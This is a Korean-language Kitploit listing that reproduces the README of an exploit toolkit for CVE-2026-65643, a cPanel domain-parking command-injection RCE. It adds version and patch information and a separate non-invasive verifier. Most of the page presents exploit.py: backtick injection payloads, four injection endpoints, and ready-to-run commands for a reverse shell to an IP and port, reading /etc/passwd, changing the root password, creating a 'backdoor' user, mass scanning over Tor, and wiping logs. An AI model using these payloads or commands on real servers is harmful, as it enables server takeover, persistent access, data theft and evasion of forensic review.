Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-65643-PoC-Toolkit — Red/Blue 팀 툴킷으로, cPanel 도메인 파킹 RCE인 CVE-2026-65643을 위한 도구입니다. 리버스 셸, 웹셸, 지속성, 대량 스캔 기능을 갖춘 익스플로잇과, 탐지 및 감사를 위한 비침습적 검증기를 포함합니다. | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Privilege EscalationVulnerability ScannersPersistence MechanismsExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Red/Blue 팀 툴킷으로, cPanel 도메인 파킹 RCE인 CVE-2026-65643을 위한 도구입니다. 리버스 셸, 웹셸, 지속성, 대량 스캔 기능을 갖춘 익스플로잇과, 탐지 및 감사를 위한 비침습적 검증기를 포함합니다.

저장소 보기
1일 전아직 검토되지 않음

CVEPoC

CVE‑2026‑65643 – cPanel 도메인 파킹 RCE 툴킷

Python 3.8+ CVSS Author cPanel

⚠️ 윤리적 사용 전용 – 승인된 보안 테스트 이 저장소는 승인된 보안 전문가, 블루 팀, 침투 테스터만을 위한 도구를 제공합니다. 승인되지 않은 컴퓨터 시스템 접근은 CFAA(미국), Computer Misuse Act(영국), TCK 243/244(터키) 및 전 세계의 유사한 법률에 따라 불법입니다.


📖 취약점 개요

CVE‑2026‑65643은 cPanel & WHM 11.x 버전에서 발견된 치명적인 명령 주입 취약점으로, 인증된 cPanel 사용자가 도메인 파킹 기능을 통해 루트 권한으로 임의의 시스템 명령을 실행할 수 있게 합니다.

작동 방식

  1. 인증된 접근 필요 – 공격자는 대상 서버에 유효한 cPanel 계정(사용자 이름/비밀번호)을 보유해야 합니다.
  2. 도메인 파킹 주입 – 파킹된 도메인을 추가할 때 도메인 이름이 제대로 검증되지 않아, 공격자가 백틱(`)을 사용하여 셸 명령을 주입할 수 있습니다.
  3. 명령 실행 – 주입된 명령은 cPanel 사용자의 권한으로 시스템에 의해 실행되며, 권한 상승 기법을 통해 루트 권한으로 승격될 수 있습니다.
  4. 루트 권한 – 도메인 파킹 작업이 충분한 권한으로 실행되므로, 높은 권한으로 임의의 명령을 실행할 수 있습니다.
  5. 영향 – 전체 서버 장악, 데이터 탈취, 백도어, 랜섬웨어, 수평 이동. 즉시 업그레이드하세요!

영향을 받는 버전

  • cPanel & WHM 11.110.0.140 및 이전 버전 – 취약
  • 11.134.0.52 및 이전 버전 – 취약
  • 11.136.0.36 및 이전 버전 – 취약
  • 11.138.0.1 및 이전 버전 – 취약
  • 11.138.1.6 및 이후 버전 – 패치됨

패치

  • cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 또는 11.110.0.141 이상 버전으로 업그레이드하세요.
  • 업그레이드가 불가능한 경우, 임시 해결책으로 cPanel 사용자의 도메인 파킹 권한을 비활성화하세요.

🧰 도구

도구용도대상 사용자
exploit.py리버스 셸, 웹셸, 지속성, 파일 읽기/쓰기, 루트 비밀번호 변경, 대량 스캔, Tor 지원 및 OPSEC 기능을 갖춘 완전한 무기화 툴킷.레드 팀 / 승인된 침투 테스터
verifier.py악성 페이로드를 실행하지 않고 cPanel 버전을 감지하고, 주입을 검증하며, 위험을 평가하는 비침습적 취약점 검사기. 상세 보고서를 생성합니다.블루 팀 / 보안 감사자

📊 기능 비교


🎯 사용 사례 요약


⚙️ 설치

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 매개변수

exploit.py 매개변수

verifier.py 매개변수


💥 시나리오


🧪 엔드포인트 및 주입 방식

이 익스플로잇은 다음 cPanel 엔드포인트와 주입 방식을 사용합니다:

페이로드 형식

root@kitploit:~
# 주입 페이로드 형식
test.com`<command>`

# 예시
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ 책임 있는 사용

  • 소유하거나 명시적인 서면 허가를 받은 시스템에서만 이 도구를 사용하세요.
  • 승인되지 않은 접근은 불법이며 비윤리적입니다.
  • 저자는 어떠한 오용에 대해서도 책임을 지지 않습니다.
  • 항상 해당 국가의 법률과 규정을 준수하세요.

이 소프트웨어는 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.

도구 다운로드
기능exploit.pyverifier.py
취약점 탐지✅✅
버전 탐지 (4개 엔드포인트)✅✅
명령 주입✅❌
리버스 셸✅❌
웹셸 업로드✅❌
지속성 (cPanel 사용자 생성)✅❌
루트 비밀번호 변경✅❌
파일 읽기/쓰기✅❌
4가지 주입 방식 (JSON/Form/CGI/API2)✅✅
Tor 지원 (익명성)✅❌
User‑Agent 회전 (OPSEC)✅❌
지터 (OPSEC)✅❌
대량 스캔 (멀티 스레드)✅❌
대화형 셸✅❌
비침습적 (안전) 모드❌✅
타임라인 로깅✅✅
HTML 보고서✅❌
JSON 보고서✅✅
로그 정리 (안티 포렌식)✅✅
프록시 지원✅✅
사용자 지정 User‑Agent✅✅
SSL 검증 제어✅✅
시나리오권장 도구
블루 팀 – cPanel 설치가 취약한지 확인verifier.py
보안 감사 – 비침습적 취약점 평가verifier.py
레드 팀 – 전체 익스플로잇을 포함한 승인된 침투 테스트exploit.py
버그 바운티 – 책임 있는 공개 테스트verifier.py
대량 스캔 – 여러 대상의 취약점 확인exploit.py (탐지 전용)
침해 대응 – 시스템이 손상되었는지 확인verifier.py
매개변수설명
-t, --target대상 cPanel URL (예: https://cpanel.example.com:2083)
-l, --target-file대량 스캔을 위한 대상 목록 파일 (줄당 하나)
-u, --usernamecPanel 사용자 이름
-P, --passwordcPanel 비밀번호
-p, --portcPanel 포트 재정의 (기본값: URL 또는 2083)
--threads다중 대상 스캔 스레드 수 (기본값: 10)
-o, --outputJSON 보고서를 파일로 저장
--html-reportHTML 보고서를 파일로 저장
-v, --verbose상세 출력
--proxyHTTP/HTTPS 프록시 (예: http://127.0.0.1:8080)
--torTor 경유 (localhost:9050)
-ua, --user-agent사용자 지정 User‑Agent
--no-keep-alive세션 유지 안 함
--delay요청 간 지연 시간 (기본값: 2.0초)
--jitter요청 간 무작위 지터 (0‑1초) (기본값: 0.5)
--max-retries최대 재시도 횟수 (기본값: 5)
--ssl-verifySSL 인증서 검증
--timeout요청 시간 초과 (기본값: 15초)
--cmd대상에서 단일 명령 실행
--reverse-shell리버스 셸 IP:PORT
--passwd루트 비밀번호 변경
--addusercPanel 사용자 생성 (USER DOMAIN PASSWORD)
--read파일 읽기
--write파일 쓰기 (경로 지정)
--write-content쓸 내용
--cleanup익스플로잇 후 로그 및 기록 정리
-i, --interactive익스플로잇 후 대화형 셸
--domain-suffix파킹 도메인 접미사 (기본값: exploit.local)
매개변수설명
-t, --target대상 cPanel URL (예: https://cpanel.example.com:2083)
-u, --usernamecPanel 사용자 이름
-P, --passwordcPanel 비밀번호
-o, --outputJSON 보고서를 파일로 저장
-v, --verbose상세 출력
--proxyHTTP/HTTPS 프록시 (예: http://127.0.0.1:8080)
--torTor 경유 (localhost:9050)
--ssl-verifySSL 인증서 검증
--timeout요청 시간 초과 (기본값: 15초)
--cleanup테스트 후 로그 정리
#시나리오명령어
1빠른 취약점 확인python verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2보고서 포함 상세 스캔python verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3리버스 셸python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4명령 실행python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5민감한 파일 읽기python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6루트 비밀번호 변경python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7새 cPanel 사용자 생성 (지속성)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8익스플로잇 후 대화형 셸python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9파일에서 대량 스캔python exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10프록시, Tor 및 사용자 지정 User‑Agent 사용python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11익스플로잇 후 로그 정리python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
방식엔드포인트설명
JSON API/cpsessXXXXX/json-api/domainJSON 페이로드를 통한 기본 주입 방식
Form Data/cpsessXXXXX/json-api/domain폼 인코딩 데이터를 통한 대체 주입
CGI 스크립트/cgi-sys/domainpark.cgi레거시 CGI 엔드포인트 주입
API2/cpsessXXXXX/json-api/cpanel레거시 API2 주입 방식